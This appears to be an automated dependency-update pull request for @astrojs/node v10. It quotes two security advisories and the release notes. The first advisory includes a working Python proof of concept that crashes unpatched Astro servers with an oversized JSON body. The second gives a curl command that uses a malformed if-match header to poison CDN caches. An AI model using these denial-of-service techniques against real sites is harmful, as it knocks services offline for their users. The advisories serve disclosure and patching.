Update dependency @astrojs/node to v10 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@astrojs/node (source)	^9.5.4 → ^10.0.5

---

Astro: Memory exhaustion DoS due to missing request body size limit in Server Islands

CVE-2026-29772 / GHSA-3rmj-9m5h-8fpv

More information

Details

Summary

Astro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because JSON.parse() allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The /_server-islands/[name] route is registered on all Astro SSR apps regardless of whether any component uses server:defer, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.

Details

Astro automatically registers a Server Islands route at /_server-islands/[name] on all SSR apps, regardless of whether any component uses server:defer. The POST handler in packages/astro/src/core/server-islands/endpoint.ts buffers the entire request body into memory and parses it as JSON with no size or depth limit:

// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)
const raw = await request.text();    // full body buffered into memory — no size limit
const data = JSON.parse(raw);        // parsed into V8 object graph — no element count limit

The request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — /_server-islands/anything triggers the vulnerable code path. No authentication is required.

Additionally, JSON.parse() allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., [{},{},{},...]) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.

PoC

Environment: Astro 5.18.0, @astrojs/node 9.5.4, Node.js 22 with --max-old-space-size=128.

The app does not use server:defer — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.

Setup files:

package.json:

{
  "name": "poc-server-islands-dos",
  "scripts": {
    "build": "astro build",
    "start": "node --max-old-space-size=128 dist/server/entry.mjs"
  },
  "dependencies": {
    "astro": "5.18.0",
    "@​astrojs/node": "9.5.4"
  }
}

astro.config.mjs:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
});

src/pages/index.astro:

---
---
<html>
<head><title>Astro App</title></head>
<body>
  <h1>Hello</h1>
  <p>Just a plain SSR page. No server islands.</p>
</body>
</html>

Dockerfile:

FROM node:22-slim
WORKDIR /app
COPY package.json .
RUN npm install
COPY . .
RUN npm run build
EXPOSE 4321
CMD ["node", "--max-old-space-size=128", "dist/server/entry.mjs"]

docker-compose.yml:

services:
  astro:
    build: .
    ports:
      - "4321:4321"
    deploy:
      resources:
        limits:
          memory: 256m

Reproduction:

##### Build and start
docker compose up -d

##### Verify server is running
curl http://localhost:4321/

##### => 200 OK

crash.py:

import requests

##### Any path under /_server-islands/ works — no valid island name needed
TARGET = "http://localhost:4321/_server-islands/x"

##### 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object

##### 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit
n = 3_000_000
payload = '[' + ','.join(['{}'] * n) + ']'
print(f"Payload: {len(payload) / (1024*1024):.1f} MB")

try:
    r = requests.post(TARGET, data=payload,
        headers={"Content-Type": "application/json"}, timeout=30)
    print(f"Status: {r.status_code}")
except requests.exceptions.ConnectionError:
    print("Server crashed (OOM killed)")

$ python crash.py
Payload: 8.6 MB
Server crashed (OOM killed)

$ curl http://localhost:4321/
curl: (7) Failed to connect to localhost port 4321: Connection refused

$ docker compose ps
NAME      IMAGE     COMMAND   SERVICE   CREATED   STATUS    PORTS
(empty — container was OOM killed)

The server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.

Impact

Any Astro SSR app with the Node standalone adapter is affected — the /_server-islands/[name] route is registered by default regardless of whether any component uses server:defer. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the [name] parameter works because the body is parsed before the name is validated.

Severity

• CVSS Score: 5.9 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv
• https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f
• https://github.com/withastro/astro/releases/tag/@​astrojs/node@10.0.0
• https://nvd.nist.gov/vuln/detail/CVE-2026-29772
• https://github.com/advisories/GHSA-3rmj-9m5h-8fpv

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Astro: Cache Poisoning due to incorrect error handling when if-match header is malformed

CVE-2026-41322 / GHSA-c57f-mm3j-27q9

More information

Details

Summary

Requesting a static JS/CSS resource from the _astro path with an incorrect or malformed if-match header returns a 500 error with a one-year cache lifetime instead of 412 in some cases. As a result, all subsequent requests to that file — regardless of the if-match header — will be served a 5xx error instead of the file until the cache expires.

Sending an incorrect or malformed if-match header should always return a 412 error without any cache headers, which is not the current behavior.

Affected Versions

• astro@5.14.1
• @astrojs/node@9.4.4

Proof of Concept

Run the following command:

curl -s -o /dev/null -D - <host location>/_astro/_slug_.UTbyeVfw.css -H "if-match: xxx"

If a 5xx error is not returned, inspect the resources via the browser's web inspector and select another CSS/JS file to request until a 5xx error is returned. The behavior generally defaults to a 5xx response. Note that all static files are immutable, so the cache must be purged or disabled to reproduce reliably.

A response similar to the following is expected from CloudFront:

HTTP/2 500 
content-type: text/html
content-length: 166541
date: Thu, 09 Apr 2026 12:53:08 GMT
last-modified: Wed, 21 Jan 2026 13:40:08 GMT
etag: "a68349e96c2faf8861c330aeb548441a"
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
x-cache: Error from cloudfront
via: 1.1 3591be88662e5675a9dc1cc4e0a9c392.cloudfront.net (CloudFront)
x-amz-cf-pop: ZRH55-P2
x-amz-cf-id: Rg--RIYCKcA55GZqZXdvu-VTvpxBFFVzV4LBIcKq5pB_hktcrhYbKg==

The above is not the real server output but the AWS error response triggered when the pods return a 5xx. Below is the output of the same curl command issued directly against a pod in Kubernetes:

❯ curl -s -o /dev/null -D - -H "Host: tagesanzeiger.ch" 127.0.0.1:3333/_astro/InstallPrompt.astro_astro_type_script_index_0_lang.C0M4llHG.js -H "if-match: xxx"

HTTP/1.1 500 Internal Server Error
Cache-Control: public, max-age=31536000, immutable
Accept-Ranges: bytes
Last-Modified: Tue, 07 Apr 2026 07:08:03 GMT
ETag: W/"560-19d66c50c38"
Content-Type: text/javascript; charset=utf-8
Date: Tue, 07 Apr 2026 08:23:54 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

This demonstrates that the pod itself returns a 5xx error instead of 412. In addition, the response includes a Cache-Control: public, max-age=31536000, immutable header.

Because the testing setup configures if-match as part of the cache key, the exploit no longer affects the production application. Prior to that change, the CDN Point of Presence would become cache-poisoned, and any client visiting the affected pages without cached files through the same PoP would receive broken pages. This was reproduced by creating test URLs and visiting them in a browser only after triggering the exploit. The exploited resources returned 5xx errors instead of the original CSS/JS content, breaking the application.

Details

The findings were analyzed with an LLM, which identified the following file as the likely source: serve-static.ts

// Lines 129-153

let forwardError = false;

stream.on('error', (err) => {
    if (forwardError) {
        console.error(err.toString());
        res.writeHead(500);
        res.end('Internal server error');
        return;
    }
    // File not found, forward to the SSR handler
    ssr();
});
stream.on('headers', (_res: ServerResponse) => {
    // assets in dist/_astro are hashed and should get the immutable header
    if (normalizedPathname.startsWith(`/${app.manifest.assetsDir}/`)) {
        // This is the "far future" cache header, used for static files whose name includes their digest hash.
        // 1 year (31,536,000 seconds) is convention.
        // Taken from https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control#immutable
        _res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
    }
});
stream.on('file', () => {
    forwardError = true;
});
stream.pipe(res);

LLM analysis:

send handles conditional request headers such as If-Match internally. When a file is found but the precondition fails (ETag mismatch), send:

1. Emits file (the file exists) → forwardError = true
2. Emits headers → Cache-Control: public, max-age=31536000, immutable is set on res
3. Emits error with a PreconditionFailedError (status 412)

However, the error handler does not inspect the error's status code:

stream.on('error', (err) => {
    if (forwardError) {
        console.error(err.toString());
        res.writeHead(500);   // ← always 500, regardless of the actual error
        res.end('Internal server error');
        return;
    }
    ssr();
});

Because Cache-Control was already set during the headers event, the response is sent as:

HTTP/1.1 500 Internal Server Error
Cache-Control: public, max-age=31536000, immutable

Impact

Cache Poisoning — An attacker can force edge servers to cache an error page instead of the actual content, rendering one or more assets unavailable to legitimate users until the cache expires.

Severity

• CVSS Score: 5.3 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References

• https://github.com/withastro/astro/security/advisories/GHSA-c57f-mm3j-27q9
• https://nvd.nist.gov/vuln/detail/CVE-2026-41322
• https://github.com/advisories/GHSA-c57f-mm3j-27q9

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

withastro/astro (@​astrojs/node)

v10.0.5

Compare Source

Patch Changes

• #​16319 940afd5 Thanks @​matthewp! - Fixes static asset error responses incorrectly including immutable cache headers. Conditional request failures (e.g. If-Match mismatch) now return the correct status code without far-future cache directives.

v10.0.4

Compare Source

Patch Changes

• #​16002 846f27f Thanks @​buley! - Fixes file descriptor leaks from read streams that were not destroyed on client disconnect or read errors

• #​15941 f41584a Thanks @​ematipico! - Fixes an infinite loop in resolveClientDir() when the server entry point is bundled with esbuild or similar tools. The function now throws a descriptive error instead of hanging indefinitely when the expected server directory segment is not found in the file path.

v10.0.3

Compare Source

Patch Changes

• #​15735 9685e2d Thanks @​fa-sharp! - Fixes an EventEmitter memory leak when serving static pages from Node.js middleware.

  When using the middleware handler, requests that were being passed on to Express / Fastify (e.g. static files / pre-rendered pages / etc.) weren't cleaning up socket listeners before calling next(), causing a memory leak warning. This fix makes sure to run the cleanup before calling next().

v10.0.2

Compare Source

Patch Changes

• #​15934 6f8f0bc Thanks @​ematipico! - Updates the Astro peerDependencies#astro to be 6.0.0.

v10.0.1

Compare Source

Patch Changes

• #​15868 bb2b8f5 Thanks @​ematipico! - Fixes an issue where the adapter would cause a series of warnings during the build.

v10.0.0

Compare Source

Major Changes

• #​15654 a32aee6 Thanks @​florian-lefebvre! - Removes the experimentalErrorPageHost option

  This option allowed fetching a prerendered error page from a different host than the server is currently running on.

  However, there can be security implications with prefetching from other hosts, and often more customization was required to do this safely. This has now been removed as a built-in option so that you can implement your own secure solution as needed and appropriate for your project via middleware.

What should I do?

If you were previously using this feature, you must remove the option from your adapter configuration as it no longer exists:

// astro.config.mjs
import { defineConfig } from 'astro/config'
import node from '@​astrojs/node'

export default defineConfig({
  adapter: node({
    mode: 'standalone',
-    experimentalErrorPageHost: 'http://localhost:4321'
  })
})

You can replicate the previous behavior by checking the response status in a middleware and fetching the prerendered page yourself:

// src/middleware.ts
import { defineMiddleware } from 'astro:middleware';

export const onRequest = defineMiddleware(async (ctx, next) => {
  const response = await next();
  if (response.status === 404 || response.status === 500) {
    return fetch(`http://localhost:4321/${response.status}.html`);
  }
  return response;
});

Minor Changes

• #​15258 d339a18 Thanks @​ematipico! - Stabilizes the adapter feature experimentalStatiHeaders. If you were using this feature in any of the supported adapters, you'll need to change the name of the flag:

  export default defineConfig({
    adapter: netlify({
  -    experimentalStaticHeaders: true
  +    staticHeaders: true
    })
  })

• #​15759 39ff2a5 Thanks @​matthewp! - Adds a new bodySizeLimit option to the @astrojs/node adapter

  You can now configure a maximum allowed request body size for your Node.js standalone server. The default limit is 1 GB. Set the value in bytes, or pass 0 to disable the limit entirely:

  import node from '@​astrojs/node';
  import { defineConfig } from 'astro/config';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
      bodySizeLimit: 1024 * 1024 * 100, // 100 MB
    }),
  });

• #​15006 f361730 Thanks @​florian-lefebvre! - Adds new session driver object shape

  For greater flexibility and improved consistency with other Astro code, session drivers are now specified as an object:

  -import { defineConfig } from 'astro/config'
  +import { defineConfig, sessionDrivers } from 'astro/config'
  
  export default defineConfig({
    session: {
  -    driver: 'redis',
  -    options: {
  -      url: process.env.REDIS_URL
  -    },
  +    driver: sessionDrivers.redis({
  +      url: process.env.REDIS_URL
  +    }),
    }
  })

  Specifying the session driver as a string has been deprecated, but will continue to work until this feature is removed completely in a future major version. The object shape is the current recommended and documented way to configure a session driver.

• #​14946 95c40f7 Thanks @​ematipico! - Removes the experimental.csp flag and replaces it with a new configuration option security.csp - (v6 upgrade guidance)

Patch Changes

• #​15473 d653b86 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

• #​15562 e14a51d Thanks @​florian-lefebvre! - Updates to new Adapter API introduced in v6

• #​15585 98ea30c Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15777 02e24d9 Thanks @​matthewp! - Fixes CSRF origin check mismatch by passing the actual server listening port to createRequest, ensuring the constructed URL origin includes the correct port (e.g., http://localhost:4321 instead of http://localhost). Also restricts X-Forwarded-Proto to only be trusted when allowedDomains is configured.

• #​15714 9a2c949 Thanks @​ematipico! - Fixes an issue where static headers weren't correctly applied when the website uses base.

• #​15763 1567e8c Thanks @​matthewp! - Normalizes static file paths before evaluating dotfile access rules for improved consistency

• #​15164 54dc11d Thanks @​HiDeoo! - Fixes an issue where the Node.js adapter could fail to serve a 404 page matching a pre-rendered dynamic route pattern.

• #​15745 20b05c0 Thanks @​matthewp! - Hardens static file handler path resolution to ensure resolved paths stay within the client directory

• #​15495 5b99e90 Thanks @​leekeh! - Refactors to use middlewareMode adapter feature (set to classic)

• #​15657 cb625b6 Thanks @​qzio! - Adds a new security.actionBodySizeLimit option to configure the maximum size of Astro Actions request bodies.

  This lets you increase the default 1 MB limit when your actions need to accept larger payloads. For example, actions that handle file uploads or large JSON payloads can now opt in to a higher limit.

  If you do not set this option, Astro continues to enforce the 1 MB default to help prevent abuse.

  // astro.config.mjs
  export default defineConfig({
    security: {
      actionBodySizeLimit: 10 * 1024 * 1024, // set to 10 MB
    },
  });

• Updated dependencies [4ebc1e3, 4e7f3e8, a164c77, cf6ea6b, a18d727, 240c317, 745e632]:

  • @​astrojs/internal-helpers@​0.8.0

v9.5.5

Compare Source

Patch Changes

• Updated dependencies [c2cd371]:
  • @​astrojs/internal-helpers@​0.7.6

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[cla-assistant]

All committers have signed the CLA.